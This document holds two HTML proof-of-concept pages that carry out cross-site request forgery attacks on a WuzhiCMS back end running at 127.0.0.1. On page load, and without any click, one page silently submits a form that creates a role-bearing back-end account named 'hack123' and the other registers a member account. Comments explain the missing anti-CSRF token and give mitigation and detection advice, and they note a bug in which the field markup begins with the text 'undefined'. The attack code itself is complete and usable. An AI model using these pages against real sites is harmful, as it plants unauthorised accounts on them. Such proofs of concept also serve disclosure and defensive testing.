CSRF1
<!--
  CSRF proof of concept against a local WuzhiCMS back end (m=core, f=power, v=add).
  What it shows for defenders: the state-changing request is built from static,
  predictable parameters only. No per-session anti-CSRF token appears among the
  submitted fields, so the endpoint presumably authorises the request on the
  browser's ambient session cookie alone (to be confirmed against the server code).
  Mitigation: require and verify an unpredictable per-session token on every
  state-changing back-end action, set SameSite on the session cookie, and reject
  POSTs whose Origin/Referer is not the application's own origin.
  Detection: back-end "add" requests whose Origin/Referer header is foreign or absent.
-->
<html>
<body>
<script type="text/javascript">
  /**
   * Creates a form element, fills it with the supplied markup, attaches it to
   * the document body and submits it as a POST in the current browsing context.
   *
   * @param {string} url    Value assigned to the form's action attribute.
   * @param {string} fields Markup assigned to the form's innerHTML.
   */
  function post(url, fields) {
    var form = document.createElement("form");
    form.action = url;
    form.innerHTML = fields;
    form.target = "_self";
    form.method = "post";
    document.body.appendChild(form);
    form.submit();
  }

  /**
   * Assembles the hidden inputs and the target URL, then hands both to post().
   * Judging by the field names, the request creates a back-end account with a
   * role; the exact server-side meaning is not visible on this page.
   */
  function csrf_hack() {
    var inputs = [
      "<input type='hidden' name='formrole' value='1' />",
      "<input type='hidden' name='formusername' value='hack123' />",
      "<input type='hidden' name='formpassword' value='' />",
      // NOTE(review): 'email protected' looks like an extraction placeholder; kept verbatim.
      "<input type='hidden' name='formtruename' value='email protected' />"
    ];

    // NOTE(review): the accumulator is never initialised, so the resulting
    // markup starts with the literal text "undefined". Kept as in the original.
    var markup;
    for (var i = 0; i < inputs.length; i++) {
      markup += inputs[i];
    }

    var target = "http://127.0.0.1/www/index.php?m=core&f=power&v=add&&_su=wuzhicms&_menuid=61&_submenuid=62&submit=提交";
    post(target, markup);
  }

  // The request fires as soon as the page finishes loading, without any click.
  window.onload = function () {
    csrf_hack();
  };
</script>
</body>
</html>
CSRF2
<!--
  CSRF proof of concept against a local WuzhiCMS back end (m=member, f=index, v=add).
  What it shows for defenders: every submitted value is static and predictable.
  No per-session anti-CSRF token appears among the fields, so the endpoint
  presumably relies on the browser's ambient session cookie alone (to be
  confirmed against the server code).
  Mitigation: require and verify an unpredictable per-session token on every
  state-changing back-end action, set SameSite on the session cookie, and reject
  POSTs whose Origin/Referer is not the application's own origin.
  Detection: member "add" requests whose Origin/Referer header is foreign or absent.
-->
<html>
<body>
<script type="text/javascript">
  /**
   * Creates a form element, fills it with the supplied markup, attaches it to
   * the document body and submits it as a POST in the current browsing context.
   *
   * @param {string} url    Value assigned to the form's action attribute.
   * @param {string} fields Markup assigned to the form's innerHTML.
   */
  function post(url, fields) {
    var form = document.createElement("form");
    form.action = url;
    form.innerHTML = fields;
    form.target = "_self";
    form.method = "post";
    document.body.appendChild(form);
    form.submit();
  }

  /**
   * Assembles the hidden inputs and the target URL, then hands both to post().
   * Judging by the field names, the request registers a member account; the
   * exact server-side meaning of each field is not visible on this page.
   */
  function csrf_hack() {
    var inputs = [
      "<input type='hidden' name='infousername' value='hack123' />",
      "<input type='hidden' name='infopassword' value='hacktest' />",
      "<input type='hidden' name='infopwdconfirm' value='hacktest' />",
      // NOTE(review): 'email protected' looks like an extraction placeholder; kept verbatim.
      "<input type='hidden' name='infoemail' value='email protected' />",
      "<input type='hidden' name='infomobile' value='' />",
      "<input type='hidden' name='modelids' value='10' />",
      "<input type='hidden' name='infogroupid' value='3' />",
      // The original repeats the 'pids' input four times; all four are kept.
      "<input type='hidden' name='pids' value='0' />",
      "<input type='hidden' name='pids' value='0' />",
      "<input type='hidden' name='pids' value='0' />",
      "<input type='hidden' name='pids' value='0' />",
      "<input type='hidden' name='avatar' value='' />",
      "<input type='hidden' name='islock' value='0' />",
      "<input type='hidden' name='sys_name' value='0' />",
      "<input type='hidden' name='infobirthday' value='' />",
      "<input type='hidden' name='infotruename' value='' />",
      "<input type='hidden' name='infosex' value='0' />",
      "<input type='hidden' name='infomarriage' value='0' />"
    ];

    // NOTE(review): the accumulator is never initialised, so the resulting
    // markup starts with the literal text "undefined". Kept as in the original.
    var markup;
    for (var i = 0; i < inputs.length; i++) {
      markup += inputs[i];
    }

    var target = "http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=提交";
    post(target, markup);
  }

  // The request fires as soon as the page finishes loading, without any click.
  window.onload = function () {
    csrf_hack();
  };
</script>
</body>
</html>